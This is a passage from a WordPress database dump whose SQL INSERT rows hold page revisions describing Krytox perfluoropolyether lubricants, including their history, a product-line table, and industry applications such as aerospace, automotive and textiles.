°F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\n</ul>\n<p><strong>Textile</strong></p>\n<p>Krytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.</p>\n<p>Krytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>No oxidation or degradation</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Compatible with oxygen and chlorine</li>\n</ul>\n<p><strong>Tire Mold</strong></p>\n<p>Krytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.</p>\n<ul>\n<li>High temperature performance</li>\n<li>Extended re-application interval</li>\n<li>Excellent adhesion</li>\n<li>High hydrolytic stability</li>\n<li>Elimination of carbon residue build-up on molds</li>\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 18:48:00', '2016-09-28 18:48:00', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2111, 1, '2016-09-28 18:48:50', '2016-09-28 18:48:50', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><strong>Krytox Performance Lubricants Product Line</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox for General Purpose Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 10X Oil / 20X Grease</td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 21X</td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 22X</td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Lubricants for Aerospace Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 143</td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 240</td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 250</td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 283</td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extended Performance Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A series oils/XP 2A series greases</td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricating Fluids for Vacuum Pump Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox Vacuum Pump Fluids</td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extra High Temperature Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- S, SX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- AC, ACX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- BD, BDX, BDZ</td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 246</td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 407</td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about these products visit: <a href="https://en.wikipedia.org/wiki/Krytox">https://en.wikipedia.org/wiki/Krytox</a>\r\n<BR>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:\r\n<BR>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Krytox Lubricants, Greases and Oils"]\r\n\r\n', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-09-28 18:48:50', '2016-09-28 18:48:50', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2113, 1, '2016-09-28 18:49:31', '2016-09-28 18:49:31', 'Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><strong>Krytox Performance Lubricants Product Line</strong></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox for General Purpose Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 10X Oil / 20X Grease</td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 21X</td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 22X</td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and generalpurpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Lubricants for Aerospace Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 143</td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 240</td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 250</td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox 283</td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extended Performance Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 1A series oils/XP 2A series greases</td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricating Fluids for Vacuum Pump Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox Vacuum Pump Fluids</td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Extra High Temperature Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- S, SX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- AC, ACX</td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT- BD, BDX, BDZ</td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 246</td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 407</td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox LVP</td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about these products visit: <a href="https://en.wikipedia.org/wiki/Krytox">https://en.wikipedia.org/wiki/Krytox</a>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Krytox Lubricants, Greases and Oils"]\r\n\r\n', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-09-28 18:49:31', '2016-09-28 18:49:31', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2115, 2, '2016-09-28 18:50:47', '2016-09-28 18:50:47', '&nbsp;\r\n\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	